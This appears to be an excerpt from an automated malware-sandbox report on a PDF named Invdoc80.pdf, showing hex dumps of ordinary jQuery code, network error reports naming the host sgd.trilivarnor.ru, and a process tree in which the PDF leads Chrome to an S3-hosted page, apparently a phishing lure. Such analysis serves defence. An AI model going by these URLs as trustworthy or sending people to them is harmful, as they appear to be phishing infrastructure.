                                                    2025-01-15 03:46:08 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                    Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                    2025-01-15 03:46:08 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                    Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                    2025-01-15 03:46:08 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                    Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                    2025-01-15 03:46:08 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                    Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                    2025-01-15 03:46:08 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                    Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.44976435.190.80.14438796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-15 03:46:08 UTC533OUTOPTIONS /report/v4?s=jmRf16zT58AexhnhmMyus9lvl3qZNKEHEVidBqmcgsGFug330Qi4deMIoU7t9JKIUQd7EqucoazHf4VrMLyQnB%2F4psuSGElWEs3s7S2J2TeaaaDUXrEyO7QEZILLsg%3D%3D HTTP/1.1
                                                    Host: a.nel.cloudflare.com
                                                    Connection: keep-alive
                                                    Origin: https://sgd.trilivarnor.ru
                                                    Access-Control-Request-Method: POST
                                                    Access-Control-Request-Headers: content-type
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-01-15 03:46:08 UTC336INHTTP/1.1 200 OK
                                                    Content-Length: 0
                                                    access-control-max-age: 86400
                                                    access-control-allow-methods: POST, OPTIONS
                                                    access-control-allow-origin: *
                                                    access-control-allow-headers: content-type, content-length
                                                    date: Wed, 15 Jan 2025 03:46:08 GMT
                                                    Via: 1.1 google
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.44976535.190.80.14438796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-15 03:46:09 UTC472OUTPOST /report/v4?s=jmRf16zT58AexhnhmMyus9lvl3qZNKEHEVidBqmcgsGFug330Qi4deMIoU7t9JKIUQd7EqucoazHf4VrMLyQnB%2F4psuSGElWEs3s7S2J2TeaaaDUXrEyO7QEZILLsg%3D%3D HTTP/1.1
                                                    Host: a.nel.cloudflare.com
                                                    Connection: keep-alive
                                                    Content-Length: 434
                                                    Content-Type: application/reports+json
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-01-15 03:46:09 UTC434OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 30 34 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 73 67 64 2e 74 72 69 6c 69 76 61 72 6e 6f 72 2e 72 75 2f 4e 69 4b 55 33 49 53 67 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 31 38 2e 32 32 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72
                                                    Data Ascii: [{"age":0,"body":{"elapsed_time":304,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://sgd.trilivarnor.ru/NiKU3ISg/","sampling_fraction":1.0,"server_ip":"104.21.18.22","status_code":404,"type":"http.error"},"type":"network-err
                                                    2025-01-15 03:46:09 UTC168INHTTP/1.1 200 OK
                                                    Content-Length: 0
                                                    date: Wed, 15 Jan 2025 03:46:09 GMT
                                                    Via: 1.1 google
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:22:45:36
                                                    Start date:14/01/2025
                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Invdoc80.pdf"
                                                    Imagebase:0x7ff6bc1b0000
                                                    File size:5'641'176 bytes
                                                    MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:1
                                                    Start time:22:45:37
                                                    Start date:14/01/2025
                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                    Imagebase:0x7ff74bb60000
                                                    File size:3'581'912 bytes
                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:22:45:37
                                                    Start date:14/01/2025
                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2156 --field-trial-handle=1576,i,4807807924822789699,11470984042719597110,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                    Imagebase:0x7ff74bb60000
                                                    File size:3'581'912 bytes
                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:22:46:01
                                                    Start date:14/01/2025
                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://oulkiate.s3.ap-southeast-1.amazonaws.com/index.html"
                                                    Imagebase:0x7ff76e190000
                                                    File size:3'242'272 bytes
                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:10
                                                    Start time:22:46:02
                                                    Start date:14/01/2025
                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1992,i,17273167691560878123,8173139342692209947,262144 /prefetch:8
                                                    Imagebase:0x7ff76e190000
                                                    File size:3'242'272 bytes
                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    No disassembly